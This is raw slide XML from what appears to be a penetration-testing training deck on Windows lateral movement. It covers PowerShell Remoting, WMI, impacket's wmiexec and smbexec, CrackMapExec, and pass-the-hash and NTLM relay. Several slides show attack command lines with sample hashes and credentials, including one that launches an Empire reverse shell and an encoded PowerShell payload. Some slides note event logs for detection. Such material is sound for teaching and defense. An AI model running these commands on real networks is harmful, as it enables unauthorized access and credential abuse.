        <p:spPr>
          <a:xfrm>
            <a:off x="1045691" y="2150163"/>
            <a:ext cx="83542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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Review of Level 1+2+3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C2FC3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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lateral Movement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C2FC3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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pwn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC3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C2FC32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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defenses????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F70FD-D8F7-4E32-8150-5383EF3175F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368677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latin typeface="Titillium Web" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Powershell Remoting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7DD77E1-1FB0-489E-BAF7-B258863E0FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145364" y="1573339"/>
            <a:ext cx="11901266" cy="21357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Usage :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt; Invoke-Command -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> (Get-Content &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>serverList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;) -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>FilePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> &lt;path-to-script&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ArgumentList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> &lt;arg1,2&gt;            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buncha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> commands on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buncha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> computers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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; Enter-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;host&gt;             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solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>starts an interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> session on a remote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795B1-ED17-4C4F-8870-A473E496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65" y="4572854"/>
            <a:ext cx="9957792" cy="17559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DABF9B9-9055-4F2D-AF4D-8AAF2B64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2515217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WMI - Windows Management Instrumentation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9416C-CB23-4AC3-8834-2B4596182143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52189" y="2122472"/>
            <a:ext cx="495087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WMI = Local and Remote management of Windows hosts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Pre-installed on all Windows systems back to Windows 98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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No files written to disk, no registry changes. Stores info in WMI repository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DCOM = default protocol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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heavily used in Windows OS, like Windows updates == can’t disable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/>
              <a:t>Notably hit the scene in 2010 with the discovery of Stuxnet (possibly as early as 2005)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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IFTTT type triggers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5A99FC-516A-4068-AC18-7886E82BB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638" y="2073966"/>
            <a:ext cx="6675362" cy="4139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CD159D-841F-4C40-B835-5678B66D55BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7188943" y="6581001"/>
            <a:ext cx="7969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https://msdn.microsoft.com/en-us/library/aa394553(v=vs.85).aspx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48769A-E624-43C4-B6CC-7F74C43D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258974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WMI - Windows Management Instrumentation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9416C-CB23-4AC3-8834-2B4596182143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095997" y="3349036"/>
            <a:ext cx="58620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WMI, DCOM, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> events are logged to the following event logs: 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Microsoft-Windows-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Operational </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft-Windows-WMI-Activity/Operational </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft-Windows-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DistributedCOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC3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C5AF7-3D90-4E27-9302-CFE1291AD93B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105198" y="2274838"/>
            <a:ext cx="554603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Relatively easy to detect, if you are looking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Nearly all OS actions can fire a WMI event</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Kansa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*smart Attackers may remove Defenders event subscriptions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64085-9606-415A-AE9D-E4A4C40E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1422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latin typeface="Titillium Web" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>WMIExec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A2D481D-E1E7-4677-B96D-FAA1DDEAB5B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232115" y="1740044"/>
            <a:ext cx="11857143" cy="259984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Get it from: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Kali - built-in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/share/doc/python-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/examples/wmiexec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Github - as a part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>impacket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https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Empire module   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>lateral_movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>invoke_wmi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>CME - default usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pP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5441C5-9D18-4332-A046-79A5275E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DCDA9-F8AA-486C-8E23-1F8069AB88E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102741" y="4644137"/>
            <a:ext cx="12089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Usage:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python wmiexec.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nooutput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -hashes ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LMHash:NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Username’@IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python wmiexec.py -hashes ‘b4b9b02e6f09a9bd760f388b67351e2b:afe04867ec7a3845145579a95f72eca7’ ‘Bob’@10.10.100.112  &lt;Empire reverse shell launcher&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python wmixec.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nooutput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “ACME/Administrator:AdminPass!2@10.10.111.201” “powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -exec bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>encodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JKJDSFKNKssdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jdfYUA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>==“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CD7141-0CD6-4581-897D-DC911C24C572}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6393766" y="3945988"/>
            <a:ext cx="590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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.      Supports pass the hash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83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SMBExec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4340C-D41A-4CEA-B749-556EAD262C0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279241" y="1727332"/>
            <a:ext cx="11769738" cy="14027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800" dirty="0"/>
              <a:t>Get it from: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Kali Built in /usr/share/doc/python-impacket/examples/smbexec.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Github - as a part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>impacket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https://github.com/CoreSecurity/impacket/blob/master/examples/smbexec.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Empire module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>lateral_movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>invoke_smbexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>CME - forced or fail through to 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> attempt usage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B8C6E2-A844-43E1-AC15-3D4D2CAB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3F635-12DC-435D-A2AA-9126316665A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="43372" y="5009959"/>
            <a:ext cx="12105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Usage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>python smbexec.py -hashes ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FullNTLM:HashHere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Username’@IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>python smbexec.py -hashes ‘b4b9b02e6f09a9bd760f388b67351e2b:afe04867ec7a3845145579a95f72eca7’ ‘Bob’@10.10.100.112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32811E-5A67-458C-982C-1E45D3122F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9257946" y="4147829"/>
            <a:ext cx="308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Supports pass the hash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06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WMI, SMB &amp; CME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52189" y="6396335"/>
            <a:ext cx="609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https://github.com/byt3bl33d3r/CrackMapExec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E9416C-CB23-4AC3-8834-2B4596182143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229748" y="1613945"/>
            <a:ext cx="11404233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CME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> attempts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> different command execution methods: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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wmiexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> executes commands via WMI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C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> executes commands by scheduling a task with windows task scheduler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C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smbexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> executes commands by creating and running a service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2247DEF-8EB9-4ABF-BEB7-676C60C4B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9" y="4857452"/>
            <a:ext cx="11994037" cy="1538883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/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crackmapexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill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/>
              <a:t>CME 192.168.10.11:445 WIN7BOX [*] Windows 6.1 Build 7601 (name:WIN7BOX) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>domain:LAB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000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/>
              <a:t>CME 192.168.10.11:445 WIN7BOX [+] LAB\Administrator:P@ssw0rd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Pwn3d!)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/>
              <a:t>CME 192.168.10.11:445 WIN7BOX [+] Executed command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/>
              <a:t>CME 192.168.10.11:445 WIN7BOX lab\administrator 06-05-2016 14:34:39 [*] KTHXBYE!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92B3D9-246A-4729-A246-AFF12742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158016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Passing Hashes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8EB8A-C51A-4FBB-A4CD-4A4B458A1D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907773" y="2004968"/>
            <a:ext cx="1187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You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> perform Pass-The-Hash attacks with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NTLM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> hashes.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5199EC-E285-480E-AAC3-1383A5B1BE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907773" y="3652704"/>
            <a:ext cx="1007828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aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42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39AA42-F12F-4892-8E30-B4265C2D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2494717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Passing Hashes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8EB8A-C51A-4FBB-A4CD-4A4B458A1D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907773" y="2004968"/>
            <a:ext cx="1187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You </a:t>
            </a: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CANNOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> perform Pass-The-Hash attacks with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net-NTLM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> hashes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6AC7D2-A81C-44F7-8E19-DA7ECDBB7D4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907773" y="3715871"/>
            <a:ext cx="9737035" cy="156966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admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030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5EC3CC-2432-495A-BBDE-50B3ECAF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1054101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Passing Hashes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8EB8A-C51A-4FBB-A4CD-4A4B458A1D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368897" y="2004968"/>
            <a:ext cx="45055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You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAN</a:t>
            </a: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600" b="1" i="1" dirty="0"/>
              <a:t>relay</a:t>
            </a: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rgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net-NTLM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>*since ms08-068 you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cannot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>relay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/>
              <a:t>back to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>same machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>you got the net-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> hash from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82EA10-BBF1-4338-AE20-26073350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455867-AF32-4DF0-86D0-067CADF2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93" y="1439421"/>
            <a:ext cx="5083298" cy="512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6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Relay Attacks (responder/inveigh)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84506" y="3429000"/>
            <a:ext cx="3367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‘Normal’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Auth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17197-25ED-4E21-B089-44870EFB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774" y="1570741"/>
            <a:ext cx="7909020" cy="4673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E3694-36D3-455C-A086-0E27DE3CC2A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2431774" y="6609915"/>
            <a:ext cx="7229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https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="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8B68F62-95B7-45B3-B62C-95F76BB2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23591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04A4E-CC02-47D1-A761-E1D23AF0F3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343AC-0FC2-4DD6-9CFC-5FE2E9F5B0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3867324" y="2767280"/>
            <a:ext cx="4588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Review!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
